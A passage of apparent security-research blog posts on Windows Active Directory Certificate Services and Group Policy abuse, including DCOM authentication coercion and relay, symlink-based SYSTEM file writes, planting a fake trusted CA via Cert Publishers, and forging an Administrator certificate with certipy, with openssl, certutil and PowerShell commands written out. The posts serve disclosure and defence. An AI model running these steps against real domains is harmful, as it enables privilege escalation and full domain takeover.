
Hello: I’m your ADCS server and I want to authenticate against you

By: Decoder
26 February 2024 at 15:50

In my exploration of the components and configurations related to Windows Active Directory Certificate Services (ADCS), after the “deep dive” into the Cert Publishers group, I decided to take a look at the “Certificate Service DCOM Access” group.

This group is a built-in local security group. Whenever the server assumes the role of a Certification Authority (CA) by installing the Active Directory Certificate Services (ADCS) role, the group is populated with the special NT AUTHORITY\Authenticated Users identity group, which represents every domain user account that can successfully log on to the domain.

The “DCOM Access” is somewhat intriguing; it evokes potential vulnerabilities and exploitation 😉

But let’s start from the beginning. What’s the purpose of this group? MS says: “Members of this group are allowed to connect to Certification Authorities in the enterprise”.

In simpler terms, this group can enroll certificates via DCOM. Thus, it’s logical that all authenticated users and computers have access to the specific application.

Each time a user or computer enrolls or auto-enrolls a certificate, it contacts the DCOM interfaces of the CertSrv Request application, which are exposed through MS-WCCE, the Windows Client Certificate Enrollment Protocol.

There is also a specific set of interfaces for Certificate Services Remote Administration Protocol described in MS-CSRA.

I won’t delve into the specifics of these interfaces. Maybe there are interesting interfaces to explore and abuse, but for now, my focus was drawn to the activation permissions of this DCOM server.

The DCOMCNFG tool provides us a lot of useful info.

At the computer level, the Certificate Service DCOM Access group is “limited” to Local and Remote Launch permissions:

This does not mean that this group can activate all DCOM objects; we have to look at the specific application, CertSrv Request in our case:

Everyone can remotely activate this DCOM server. To be honest, I would have expected to find the Certificate Service DCOM Access group here instead of Everyone, given that, at the computer level, Everyone is limited to Local Launch and Local Activation permissions:

Maybe some kind of combined permissions and nested memberships are also evaluated.

There’s another interesting aspect as well: from what I observed, the Certificate Service DCOM Access group is one of the few groups, along with Distributed COM Users and Performance Log Users, that are granted Remote Activation permissions.

Let’s take a look at identity too:

This DCOM application impersonates the SYSTEM account, which is what we need because it represents the highest local privileged identity.

So, we have a privileged DCOM server running that can be activated remotely by any authenticated domain user. This seems prone to our beloved *Potato exploits, don’t you think?

In summary, most of these exploits rely on abusing a DCOM activation service, running under a highly privileged context, by unmarshalling an IStorage object and reflecting the NTLM authentication back to a local RPC TCP endpoint to achieve local privilege escalation.

There are also variants of this attack that involve relaying the NTLM (and Kerberos) authentication of a user or computer to a remote endpoint using protocols such as LDAP, HTTP, or SMB, ultimately enabling privilege escalation up to Domain Admin. And this is what @splinter_code and I did in our RemotePotato0.

But this scenario is different: as a low-privileged domain user, we want to activate a remote DCOM application running under a high-privileged context and force it to authenticate against a remote listener running on our machine, so that we can capture and relay this authentication to another service.

We will (hopefully) get the authentication of the remote computer itself when the DCOM application is running under the SYSTEM or Network Service context.

Sounds great! Now, what specific steps should we take to implement this?

Well, it is much simpler than I initially thought 🙂

Starting from the original JuicyPotato, I made some minor changes:

  • Set up a redirector (socat) on a Linux machine listening on port 135, redirecting all traffic to a dedicated port (e.g., 9999) on our attacker machine. You certainly know that we can no longer specify a custom port for OXID resolution 😉
  • In the JuicyPotato code:
    • Initialize a COSERVERINFO structure and specify the IP address of the remote server where we want to activate the DCOM object (the ADCS server)
    • Initialize a COAUTHIDENTITY structure and populate the username, password, and domain attributes
    • Assign the COAUTHIDENTITY to the COSERVERINFO structure
    • In IStorageTrigger::MarshalInterface, specify the redirector IP address
    • In CoGetInstanceFromIStorage(), pass the COSERVERINFO structure:

And yes, it worked 🙂 Dumping the NTLM messages received on our socket server, we can see that we get an authentication type 3 message from the remote CA server (SRV1-MYLAB):
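To make the “dump” step concrete, here is a minimal sketch of such a listener. This is my own illustration, not the actual tool’s code: it simply looks for the NTLMSSP signature (an 8-byte magic followed by a 4-byte little-endian message type) in whatever the coerced client sends.

```python
import socket
import struct

NTLM_TYPES = {1: "NEGOTIATE", 2: "CHALLENGE", 3: "AUTHENTICATE"}

def ntlm_message_type(blob: bytes):
    """Return the NTLMSSP message type (1/2/3) if the blob carries one.

    The NTLMSSP header is the 8-byte signature "NTLMSSP\\0" followed by a
    4-byte little-endian message type.
    """
    idx = blob.find(b"NTLMSSP\x00")
    if idx == -1 or len(blob) < idx + 12:
        return None
    return struct.unpack_from("<I", blob, idx + 8)[0]

def dump_ntlm(port: int = 9999):
    """Accept one connection and report the NTLM message type it carries."""
    with socket.socket() as srv:
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            t = ntlm_message_type(conn.recv(65536))
            print(peer, NTLM_TYPES.get(t, "no NTLMSSP token found"))

if __name__ == "__main__":
    # offline sanity check with a crafted AUTHENTICATE (type 3) header
    fake = b"\x05\x00" + b"NTLMSSP\x00" + struct.pack("<I", 3) + b"\x00" * 16
    print(NTLM_TYPES[ntlm_message_type(fake)])
```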

The network capture highlights that the Remote Activation requested by our low-privileged user was successful:

The final step is to forward the NTLM authentication to an external relay, such as ntlmrelayx, enabling authentication to another service as the CA computer itself.

Last but not least, since we have an RPC client authenticating, we must encapsulate and forward the authentication messages using a protocol already supported by ntlmrelayx, such as HTTP.
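Conceptually, “encapsulating” the captured RPC-layer NTLM token for an HTTP relay just means re-wrapping the same NTLMSSP blob in the HTTP Authorization scheme. A sketch (the token bytes below are fabricated for illustration):

```python
import base64

def wrap_for_http(ntlmssp_token: bytes) -> str:
    """Re-wrap a raw NTLMSSP token (as captured from the RPC client) as the
    value of an HTTP 'Authorization' header, the framing an HTTP relay expects."""
    return "NTLM " + base64.b64encode(ntlmssp_token).decode("ascii")

# fabricated NEGOTIATE (type 1) message, for illustration only
token = b"NTLMSSP\x00\x01\x00\x00\x00" + b"\x00" * 20
print("Authorization: " + wrap_for_http(token))
```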

I bet that now the fateful question arises:

Ok, regular domain users can coerce the authentication of an ADCS server from remote, intercept the authentication messages, and relay it, but is this really useful?

Well, considering the existence of other unpatched methods to coerce authentication of a Domain Controller, such as DFSCoerce, I would argue its utility may be limited.

To complicate matters further, due to the hardening Microsoft recently introduced in DCOM, the only protocols that can currently be relayed are HTTP and SMB (if signing is not required).

In my lab, I tested the relay against the HTTP /CertSrv endpoint of a CA web enrollment server running on a different machine (guess why?… you cannot relay back to the same machine over the network). With no NTLM mitigations in place, I requested a Machine certificate for the CA server.

The attack flow is shown below:

With this certificate, I could then log onto the ADCS server in a highly privileged context. For example, I could back up the private key of the CA, ultimately enabling the forging of certificates on behalf of any user.

The POC

I rewrote some parts of our old JuicyPotato to adapt it to this new scenario. It’s a quick & dirty fix and somehow limited, but it was more than enough to achieve my goal 🙂

You can get rid of the socat redirector by using our JuicyPotatoNG code and implement a fake Oxid Resolver like we did in RemotePotato0, with the extra bonus that you can also control the SPN and perform a Kerberos relay too… but I’ll leave it up to you 😉

Source Code: https://github.com/decoder-it/ADCSCoercePotato/

Conclusions

While the method I described for coercing authentication may not be groundbreaking, it offers interesting alternative ways to force the authentication of a remote server by abusing the Remote Activation permission granted to regular domain users.

This capability is limited to the Certificate Service DCOM Access group, which is populated only when the ADCS service is running. However, there could be legacy DCOM applications that grant Remote Activation to everyone.

Imagine DCOM Applications running under the context of the “Interactive User” with Remote Activation available to regular users. With cross-session implementation, you could also retrieve the authentication of a logged-in user 😉

Another valid reason to avoid installing unnecessary services on a Domain Controller, including the ADCS service!

That’s all 🙂

Do not trust this Group Policy!

By: Decoder
23 January 2024 at 08:03

Sometimes I think that starting with a hypothetical scenario can be better than immediately diving into the details of a vulnerability. This approach, in my opinion, provides crucial context for a clearer understanding, especially when the vulnerability is easy to understand but the scenario where it could apply is not.

This post is about possible abuse of a group policy configuration for Local Privilege Escalation, very similar to the one I already reported and MS fixed with CVE-2022-37955.

First scenario

So we have our Active Directory domain MYLAB.LOCAL with several Group Policies. Any domain user can by default access the SYSVOL share, stored in this case \\mylab.local\sysvol\mylab.local\Policies, and read the configurations of the group policies.

At some point, our attention is caught by a “Files” preference group policy identified by the Files.xml file and located under the Machine context:

The Files policy is used for performing file operations such as copying or deleting one or more files from a source folder to a destination folder. The source and destination can be paths or UNC names and the operation can be performed under the Machine context or the logged-on user context if you specify it.

What actions does this policy perform on files? A thorough analysis of the contents of Files.xml can offer a clear understanding:

The configuration specifies that the file agentstartup.log, residing in the local C:\ProgramData\Agent\Logs directory, should be copied to a hidden server share logfilecollector$ within the agentstartup folder on the server. The destination filename on the server will be derived from the computer name.
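Based on that description, the relevant portion of such a Files.xml would look roughly like this. Note this is a hand-written illustration: the clsid, uid, and timestamp attributes are omitted, and attribute names should be checked against a real GPP export.

```xml
<Files>
  <File name="agentstartup.log" status="agentstartup.log">
    <!-- action="U" (update) copies the source file over the target -->
    <Properties action="U"
                fromPath="C:\ProgramData\Agent\Logs\agentstartup.log"
                targetPath="\\SRV1-MYLAB\logfilecollector$\agentstartup\%ComputerName%.log"/>
  </File>
</Files>
```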

This policy has been configured to copy the log files produced during the startup phase of an agent running on the domain computers to a centralized location. Alternatively, a group policy startup script executing identical copy operations could also be employed and would yield the same outcome.

When will the policy be processed? Running under the Machine context, at startup, and also on demand by performing a gpupdate /force command. This share should be writable by the computer accounts to which the policy is applied.

This is how the policy, configured by an administrator, would look:

And this is how the file server should have been configured. In this case, the directory located on the share is accessible by Domain Users in read-only but Domain Computers have modify permissions as expected:

There’s also another interesting user logfileoperator who also has modify permissions:

This account is responsible for managing log files. As a Domain User we can also look at the contents of the folder:

The policy is also applied to the file server share which hosts the destination files.

By putting all the pieces together the question is: what potential consequences could arise if this user account, logfileoperator, is compromised by an attacker? Is there any possibility of privilege escalation?

The logfileoperator account can RDP to the file server (SRV1-MYLAB in this case) as a low-privileged user to perform its maintenance tasks.

Let’s assume that our attacker, impersonating logfileoperator, gains access to SRV1-MYLAB.

Let’s check the source directory:

The default security settings of the ProgramData directory have not been modified, so low-privileged users can modify the contents of the Logs directory…

This scenario would be perfect for a very simple escalation path abusing the well-known symlink creation tricks via NtObjectManager.

To summarize:

  • Delete c:\programdata\Agent\Logs\agentstartup.log
  • Place a malicious DLL in this folder and name it agentstartup.log
  • Delete the contents of c:\logfilecollector\agentstartup
  • Create a symlink for the target file SRV1-MYLAB.log pointing to the destination C:\windows\System32\myevil.dll
  • Then perform a gpupdate /force: this triggers the group policy, which copies our malicious agentstartup.log, following the symlink configured in SRV1-MYLAB.log, to the destination c:\windows\system32\myevil.dll with SYSTEM privileges, given that the entire file copy operation is performed locally under the Machine context.
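The copy-follows-link primitive behind the last two steps can be sketched in a platform-neutral way. This toy uses POSIX symlinks and temp directories as stand-ins for the NtObjectManager tricks and the real Windows paths; it is an illustration of the primitive, not the exploit:

```python
import os
import shutil
import tempfile

base = tempfile.mkdtemp()
collector = os.path.join(base, "agentstartup")  # stand-in for c:\logfilecollector\agentstartup
protected = os.path.join(base, "System32")      # stand-in for c:\windows\system32
os.makedirs(collector)
os.makedirs(protected)

# Attacker: the "log file" the policy will write is really a link into the protected dir
os.symlink(os.path.join(protected, "myevil.dll"),
           os.path.join(collector, "SRV1-MYLAB.log"))

# Attacker: the source "log" is really the malicious payload
payload = os.path.join(base, "agentstartup.log")
with open(payload, "w") as f:
    f.write("malicious dll content")

# Victim (the SYSTEM copy triggered by gpupdate /force): opens the destination
# path blindly, follows the planted link, and writes into the protected dir
shutil.copyfile(payload, os.path.join(collector, "SRV1-MYLAB.log"))

with open(os.path.join(protected, "myevil.dll")) as f:
    print(f.read())  # the payload landed where the attacker cannot write directly
```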

However, we currently face an issue. A few years ago, MS introduced the “Redirection Trust” feature to address redirection attacks, particularly during group policy processing. This feature prevents a privileged process from reparsing a mount point created by a lower privileged process:

In Group Policy Client policy service (gpsvc) this feature is enforced.

But wait, our destination file is specified as a UNC path and not a local drive; will Redirection Trust still work in this local scenario?

Guess what, it does not work! Our dll has been successfully copied:

We can see the successful operations in Procmon tool:

It turns out that the mitigation is not effective on shares. James Forshaw already mentioned this in an old tweet:

Yes, it works on all the newest and updated versions of Windows as of now, Insider builds included:

And no, I won’t explain again how someone could misuse an arbitrary file write with SYSTEM privileges. 😉

Second Scenario

Let’s explore another hypothetical scenario. This time the administrator has set up this Folder policy:

The policy, executed within the user configuration, will remove the logs folder along with all its files and subfolders located on the share \\127.0.0.1\EXPORTS\%username%, dynamically expanded to match the currently logged-in user.

The question arises: why does this configuration involve the localhost share?

Consider a scenario in our domain where a special folder containing user data is shared on all domain computers. The share name is \\<computername>\exports\<username>, but the physical path may vary for each computer. At some point, there is the requirement to create a policy for deleting a folder under this share (in this case, “logs”). The Folder preference suits our needs perfectly, but we want to use only one policy configuration and avoid specifying the physical path, which can differ. Instead, we opt for using the common share name \\127.0.0.1\… (localhost).

By default, the delete operation is performed under the SYSTEM account (unless configured to run under the user’s context). This default behavior aligns with our requirement, ensuring the folder is reliably removed.

But again, this could lead to abuse, right? What if we redirect the folder to be deleted to a target folder inaccessible to the user?

Let’s see what could happen:

Our user has his own shared folder and contents are under his control.

In this scenario, our previous c:\programdata\Agent folder also contains another subdirectory, Updater, which stores the executable for the Agent updater and is obviously read-only for users, as opposed to the parent folder Agent, because the updater runs with SYSTEM privileges…

So what’s the possible abuse? Can we transform an arbitrary folder delete to a privilege escalation? Let’s try it by creating a junction pointing to the c:\programdata\agent and perform gpupdate:

It worked as expected: a share was specified as the target folder and the redirection mitigation did not kick in, so we were also able to delete the Updater folder. The last step would be to recreate the Updater folder, put a malicious exe inside, name it AgentUpdater.exe, trigger (or wait for) the agent to perform an update, and we have SYSTEM access…

Conclusions

This was merely a hypothetical scenario, but I presume there are other real-world situations very similar to this, don’t you agree?

For example if “Group Policy Logging and Tracing” log files are saved on a shared folder:

Hint: when the log file size exceeds 1024 KB, it will be saved as .bak and a new log file will be created. However, I’ll leave this exercise to the reader 😉

There is one limitation to exploiting this security bypass: the folder that will be redirected and contains the symlink must be a subfolder of the share; otherwise, you will encounter a “device not ready” error.

Should this be considered a misconfiguration vulnerability or a software (i.e., logic bug) vulnerability?

Hard to say, I obviously reported this to MSRC:

  • December 29, 2023: Initial submission.
  • January 11, 2024: MSRC responded, stating that the case did not meet the criteria for servicing as it necessitates “Administrator and extensive user interaction.” (????) They closed the case but indicated a possibility of revisiting it if additional information impacting the investigation could be provided.
  • January 11, 2024: I answered, providing a more detailed explanation of the scenario and attached a video. I emphasized that it does not require administrator interaction, as the issue revolves around exploiting an existing group policy with this configuration. Side note: If someone could clarify what MSRC means by “Administrator interaction is required”, I would be more than happy to correct my post and give due mention
  • January 15, 2024: No response from MSRC. I sent an email with the draft of this post attached, informing them that my intention is to publish it in the absence of their feedback
  • January 22, 2024: MSRC told me that “they looked over the article and had no concerns or corrections”. Cool, appreciate it 🙂
  • January 23, 2024: Post published.

I find it perplexing that MSRC couldn’t offer a more comprehensive justification for their decision, instead of the given one that implies it would need Administrator (???) interaction.

Well, it is what it is, I won’t be organizing a dramatic exit just because of this tiny inconvenience 😉

If MS won’t (silently) fix this issue here are my 2 cents to save the world from potential catastrophe:

  • Carefully evaluate permissions on source and destination files/folders when performing operations that involve creation or deletion operations via group policy
  • If the destination is a share, a red flag should be raised. Avoid this configuration if possible; if it is really necessary, follow the whole process logic and ask yourself at each step whether it could be abused by placing a redirection.

That’s all 🙂 ..and thanks to Robin @ipcdollar1 for the review

A “deep dive” in Cert Publishers Group

By: Decoder
20 November 2023 at 17:03

While writing my latest post, my attention was also drawn to the Cert Publishers group, which is associated with the Certificate service (ADCS) in an Active Directory Domain.

I was wondering about the purpose of this group and what type of permissions were assigned to its members. I was also curious to understand if it was possible to exploit this membership to acquire the highest privileges within a domain. By default, this group contains the computer accounts hosting the Certification Authority and Sub CA. It is not clear whether this group should be considered really highly privileged, and I have not found any documentation of potential abuse. For sure, CA and SubCA Windows servers should be considered highly privileged, even just for the fact that they can do backups of the CA keys…

Last but not least, Microsoft does not protect this group with AdminSDHolder:

What is the purpose of Cert Publishers?

Microsoft’s official documentation on this group is not very clear nor exhaustive:

Members of the Cert Publishers group are authorized to publish certificates for User objects in Active Directory.

What does this mean? Members of the group have write access to the userCertificate attribute of users and computers, and this permission is also controlled by the AdminSDHolder configuration:

The userCertificate attribute is a multi-valued attribute that contains the DER-encoded X509v3 certificates issued to the user. The public key certificates issued to this user by the Microsoft Certificate Service are stored in this attribute if the “Publish to Active Directory” is set in the Certificate Templates, which is the default for several certificate templates:

Should you accept this default setting? In theory, this would be useful when using Email Encryption, Email Signing, or the Encrypting File System (EFS). I see no other reason, and if you don’t need it, remove this flag 😉

From the security perspective, as far as I know, no reasonable path could permit an attacker to elevate the privileges by altering the certificates stored in this attribute.

There could in theory be a denial-of-service attack: adding a huge number of certificates to the attribute could create replication issues between DCs. But in my tests I was not able to reproduce this, given that there seems to be a hard limit of around 1,200 certificates (or maybe a limit on the size), at least in Windows AD 2016.

So if you really need this attribute, at least check “Do not automatically reenroll..” which will prevent uncontrolled growth of this attribute.

Is there anything else they can do? Yes!

Permissions granted to Cert Publishers in the Configuration Partition

Cert Publishers have control over some objects located under the “Public Key Services” container of the Configuration Partition of AD:

  • CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=…

Authority Information Access (AIA) is used to indicate how to access information and services related to the issuer of the certificate.

From Pkisolutions:

This container stores the intermediate CA and cross-certificates. All certificates from this container are propagated to each client in the Intermediate Certification Authority certificates store via Group Policy.

Cert Publishers have full control over it, so they can create new entries with fake certificates via certutil or adsiedit, for example:

certutil -dspublish -f fakeca.crt subCA  (sub CA)
certutil -dspublish -f fakeca.crt crossCA  (cross CA)

But the resulting fake certificates published in the intermediate CA store will not be trusted due to the missing root CA, so that is probably not useful…
We also have to keep in mind that Cert Publishers cannot modify the original AIA object created during the installation of the CA:

  • CN=[CA_NAME],CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC= …

Certificate Revocation List Distribution Point (CDP) provides information on where to find the CRL associated with the certificate.

Members of Cert Publishers have full control over this container and subsequent objects. But what’s the purpose of this container in ADCS?

From Pkisolutions:
“This container is used to store certificate revocation lists (CRL). To differentiate CRLs a separate container is created for each CA. Typically CA host NetBIOS name is used. CRLs from CDP containers are NOT propagated to clients and is used only when a certificate refers to a particular CRLDistributionPoint entry in CDP container.”

Members could overwrite attributes of the existing object, especially the certificateRevocationList and deltaRevocationList attributes, with fake ones, or just remove them. However, given that these configurations are not replicated to clients, these permissions are not very useful from an attacker’s perspective.

It’s worth noting that Cert Publishers cannot modify the extensions relative to AIA/CDP configuration of the CA server:

  • CN=[CA_NAME],CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=..

This container stores trusted root certificates. The root certificate of the CA server is automatically placed inside and the certificates will be published (via GP) under the trusted root certification authorities.

While Cert Publishers have full control over the CA_NAME object, they are unable to add other certification authority objects. This restriction is probably in place to mitigate the risk of a malicious member of the group publishing fake CA certificates, which could potentially be trusted by all clients. Hence, what are the potential abuse scenarios to consider?

Abusing the Certification Authorities object

My objective was to explore potential workarounds to have my fake Certificate Authority (CA) published and accepted as trustworthy by all clients, despite the established limitations.

Following various tests, in which I attempted to substitute the existing certificate stored in the caCertificate attribute of the CA object with a fake one, or to add a fake certificate to the current caCertificate (without success, as the fake CA was not published), I eventually identified a solution that circumvents the existing “safety” (or should we say “security”?) boundary. Why not just create a fake CA with the exact same common name as the official one? If it works as expected, it will be appended to the existing CA’s configuration…

Creating a fake self-signed CA with the openssl tool is fairly straightforward; I won’t go into the details, as I already explained this in my previous post.
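For completeness, a one-liner along these lines would do; the CA common name “mylab-CA” and the 2048-bit key are assumptions for illustration:

```shell
# Illustrative: self-signed "CA" certificate whose CN matches the legitimate
# enterprise CA's name ("mylab-CA" is an assumed name here)
openssl req -x509 -newkey rsa:2048 -nodes -days 730 \
        -keyout evilca.key -out evilca.crt \
        -subj "/O=MYLAB/CN=mylab-CA"
openssl x509 -in evilca.crt -noout -subject
```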

The provided common name matches the name of our official CA.

After obtaining the certificate, we will log in to the AD domain using the credentials of a user who is a member of Cert Publishers and proceed to add the certificate to the Certification Authorities container

We can safely ignore the error, and with adsiedit we can confirm that the certificate was added:

Let’s see if it works, but instead of waiting for the GPO refresh, we manually perform a gpupdate /force and look in the certificates of the local computer/user:

Bingo! We now have our fake Certificate Authority (CA) established as a trusted entity. To confirm its functionality, we’ll configure a web server with an SSL certificate issued by our CA.

In my instance, I used an IIS web server and requested an SSL certificate (you can do this in many different ways..) using the Certificates snap-in (I’ll omit some steps, as there is a huge documentation available on how to accomplish this)

Once we get our csr file (evil.csr), we need to setup the CA configuration for the CRL endpoints and certificate signing.

[ca]
default_ca = EVILCA
[crl_ext]
authorityKeyIdentifier=keyid:always
[EVILCA]
dir = ./
new_certs_dir = $dir
unique_subject = no
certificate = ./evilca.crt
database = ./certindex
private_key = ./evilca.key
serial = ./certserial
default_days = 729
default_md = sha1
policy = myca_policy
x509_extensions = myca_extensions
crlnumber = ./crlnumber
default_crl_days = 729
default_md = sha256
copy_extensions = copy
[myca_policy]
commonName = supplied
stateOrProvinceName = optional
countryName = optional
emailAddress = optional
organizationName = supplied
[myca_extensions]
basicConstraints = CA:false
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
keyUsage = digitalSignature,keyEncipherment
extendedKeyUsage = serverAuth
crlDistributionPoints = URI:http://192.168.1.88/root.crl

Run the usual commands:

openssl genrsa -out cert.key 2048
openssl req -new -key cert.key -out cert.csr
touch certindex
echo 01 > certserial
echo 01 > crlnumber
openssl ca -batch -config ca.conf -notext -in cert.csr -out cert.crt
openssl pkcs12 -export -out cert.p12 -inkey cert.key -in cert.crt -chain -CAfile evilca.crt
openssl ca -config ca.conf -gencrl -keyfile evilca.key -cert evilca.crt -out rt.crl.pem
openssl crl -inform PEM -in rt.crl.pem -outform DER -out root.crl

We are now ready to process the certificate request:

And import the evil.crt on our webserver. From a domain joined machine, we try to navigate to https://myevilserver.mylab.local:

As expected, the site is trusted by our fake CA.

Such a forged trusted certificate could empower a malicious actor to execute various attacks, potentially resulting in the compromise of the entire domain by enrolling any type of certificate, which will then be trusted…

While I am not an expert on these abuses, here are some initial considerations:

  • Man in the middle (MITM) attacks such as SSL inspection to decrypt all the traffic
  • Code signing of malicious enterprise applications or script
  • Server authentication, VPN,…

Moving further

But let’s go a step further. Remember my so-called Silver Certificate?

To be able to (ab)use a forged client certificate for authentication, via PKINIT or Schannel, the CA also has to be present in the NTAuthCertificates store.

Let’s consider the scenario where the Cert Publishers group is granted write access to the NTAuthcertificates object. While not the default setting, I’ve encountered a couple of real-world scenarios where this (mis)configuration was implemented. This transforms the original situation described in my previous post, by having only write permission on NTAuthcertificates, from a mere persistence technique to a genuine privilege escalation. This shift is noteworthy, especially considering that we already have a trusted Certificate Authority at our disposal, enabling the forging of client certificates.

All we need at this point is to add our fake CA certificate to the NTAuthcertificates object (assuming Cert Publishers have been granted this permission)

Let’s wait for the GP refresh on the Domain Controllers and then proceed as usual using for example the certipy tool:

certipy forge -ca-pfx evilca.pfx -upn administrator@mylab.local -subject 'CN=Administrator,CN=Users,DC=mylab,DC=local' -crl 'http://192.168.1.88/root.crl'
certipy auth -pfx administrator_forged.pfx -dc-ip 192.168.212.21

And get the expected result!

Conclusions

At the end of our experiments, we can derive the following conclusions:

  • Members of Cert Publishers can add a malicious Certification Authority to an ADCS environment, which will subsequently be trusted by all clients. While certificates issued by this CA will not automatically be trusted for client authentication via PKINIT or SChannel, they could still be abused for other malicious tasks.
  • Cert Publishers membership + write access to NTAuthcertificates is the most dangerous mix in these scenarios. You can then forge and request a certificate, the Silver++ 🙂 , for client authentication against any user in the domain.
  • Cert Publishers should be considered High-Value Targets (or Tier-0 members), and membership in this group should be actively monitored, along with possible attack paths originating from non-privileged users leading to this group.

That’s all 😉

LocalPotato HTTP edition

By: Decoder
3 November 2023 at 16:54

Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP scenario remains unpatched, as per Microsoft’s decision, and it is still effective on updated systems.

This is clearly an edge case, but it is important to be aware of it and avoid situations that could leave you vulnerable.

In this brief post, we will explain a possible method of performing an arbitrary file write with SYSTEM privileges starting from a standard user by leveraging the context swap in HTTP NTLM local authentication using the WEBDAV protocol.

For all the details about the NTLM Context swapping refer to our previous post.

Lab setup

First of all, we need to install IIS on our Windows machine and enable WebDAV. The following screenshot is taken from Windows 11, but it is quite similar on Windows servers as well.

Upon enabling WebDAV, the next step is to create a virtual directory under our root website. In this instance, we’ll name it webdavshare and mount it, for the sake of simplicity, on the C:\Windows directory.

We need to permit read/write operations on this share by adding an authoring rule:

Last but not least, we need to enable NTLM authentication and disable all the other methods:

Exploiting context swapping with http/webdav

In our latest LocalPotato release, we have added and “hardcoded” this method with the HTTP/WebDAV protocol. The tool will perform an arbitrary file write with SYSTEM privileges at the location specified in the WebDAV share, with the static content “we always love potatoes”. Refer to the source code for all the details, it’s not black magic 🙂
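Stripped of the NTLM context swap (which is the interesting part and lives in the tool), the write primitive itself is just a WebDAV PUT. This self-contained toy, with a throwaway local server standing in for IIS/WebDAV, shows the shape of the request:

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

received = {}

# Toy stand-in for the IIS/WebDAV endpoint: no NTLM dance here, it just
# accepts PUT requests the way a WebDAV share with an authoring rule would.
class PutHandler(BaseHTTPRequestHandler):
    def do_PUT(self):
        length = int(self.headers["Content-Length"])
        received[self.path] = self.rfile.read(length)
        self.send_response(201)
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass

server = HTTPServer(("127.0.0.1", 0), PutHandler)  # port 0: pick any free port
threading.Thread(target=server.serve_forever, daemon=True).start()

# The file write itself is nothing more than an HTTP PUT to the mapped path
conn = http.client.HTTPConnection("127.0.0.1", server.server_address[1])
conn.request("PUT", "/webdavshare/poc.txt", body=b"we always love potatoes")
status = conn.getresponse().status
server.shutdown()
print(status, received)
```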

You can certainly modify the code and tailor it to your specific needs, depending on the situation you encounter 😉

From NTAuthCertificates to “Silver” Certificate

By: Decoder
5 September 2023 at 16:22

In a recent assessment, I found that a user without special privileges had the ability to make changes to the NTAuthCertificates object. This misconfiguration piqued my curiosity, as I wanted to understand how this could potentially be exploited or misused.

Having write access to the NTAuthCertificates object in Windows Active Directory, which is located in the Configuration Partition, could potentially have significant consequences, as it involves the management of digital certificates used for authentication and security purposes.

The idea behind a possible abuse is to create a deceptive self-signed Certification Authority (CA) certificate and include it in the NTAuthCertificates object. As a result, any fraudulent certificates signed by this deceptive certificate will be considered legitimate. This technique, along with the Golden Certificate, which requires the knowledge of the Active Directory Certification Server (ADCS) private key, has been mentioned in the well-known research Certified Pre-Owned published a couple of years ago.

In this blog post, I will document the necessary steps and prerequisites needed for forging and abusing authentication certificates on behalf of any user obtained from a fake CA.

So this is the scenario, reproduced in my lab with the adsiedit.exe tool

If you prefer to do it from the command line, in this case PowerShell with the ActiveDirectory module installed:

# resolve the SID of the user we want to grant control to
$user = Get-ADuser user11
$dn="AD:CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mylab,DC=local"
$acl = Get-Acl $dn
$sid = $user.SID
# grant GenericAll on the NTAuthCertificates object (and descendants) to user11
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid,"GenericAll","ALLOW",([GUID]("00000000-0000-0000-0000-000000000000")).guid,"All",([GUID]("00000000-0000-0000-0000-000000000000")).guid))
Set-Acl $dn $acl
# verify the new ACE is in place
(get-acl -path $dn).access

Now that we are aware that our user (user11 in this case) has control over this object, we first need to create a fake self-signed Certification Authority. This can easily be done with the openssl toolkit.

#generate a private key for signing certificates:
openssl genrsa -out myfakeca.key 2048
#create and self sign the root certificate:
openssl req -x509 -new -nodes -key myfakeca.key -sha256 -days 1024 -out myfakeca.crt

When self-signing the root certificate you can leave all the requested fields empty, except the common name, which should reflect your fake CA name as shown in the figure below:
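If you prefer a fully non-interactive run, the same two commands can be scripted by passing the subject on the command line. A sketch (MYFAKECA is just an example CN):

```shell
# generate the fake CA key and a self-signed root cert in one non-interactive pass
openssl genrsa -out myfakeca.key 2048
# -subj skips the interactive prompts; only the CN (the fake CA name) is set
openssl req -x509 -new -nodes -key myfakeca.key -sha256 -days 1024 \
    -subj "/CN=MYFAKECA" -out myfakeca.crt
# quick sanity check of the subject
openssl x509 -in myfakeca.crt -noout -subject
```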

We need to add the public key of our fake CA (myfakeca.crt) to the cACertificate attribute stored in the NTAuthCertificates object, which defines one or more CAs that can be used during authentication. This can be done easily with the built-in certutil tool (for example, certutil -dspublish -f myfakeca.crt NTAuthCA):

Let’s check if it worked:

Yes, it worked. We now have two entries! Now that we have added our fake CA cert, we also need to create the corresponding pfx file, which will be used later in the exploitation tools.

cat myfakeca.key > myfakeca.pem
cat myfakeca.crt >> myfakeca.pem
openssl pkcs12 -in myfakeca.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out myfakeca.pfx
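Before exporting, it is worth checking that the private key and the certificate actually belong together, otherwise the resulting pfx will not be usable. A self-contained sketch (it regenerates example material so it can run standalone) compares the two moduli, which must be identical:

```shell
# (re)create the fake CA material non-interactively so the check below is self-contained
openssl genrsa -out myfakeca.key 2048
openssl req -x509 -new -nodes -key myfakeca.key -sha256 -days 1024 \
    -subj "/CN=MYFAKECA" -out myfakeca.crt
# the two fingerprints must match: same modulus = key and cert belong together
openssl rsa  -noout -modulus -in myfakeca.key | openssl md5
openssl x509 -noout -modulus -in myfakeca.crt | openssl md5
```

If the two hashes differ, you mixed up files from different runs and the pkcs12 export will produce a broken bundle.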

Everything is set up, so we can try to forge a certificate for authenticating as the Domain Admin. In this example, we will use the certipy tool, but you could also use the ForgeCert tool on Windows machines.

certipy forge -ca-pfx myfakeca.pfx -upn [email protected] -subject 'CN=Administrator,OU=Accounts,OU=T0,OU=Admin,DC=mylab,DC=local'
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'

Once we get the forged cert let’s try to authenticate:

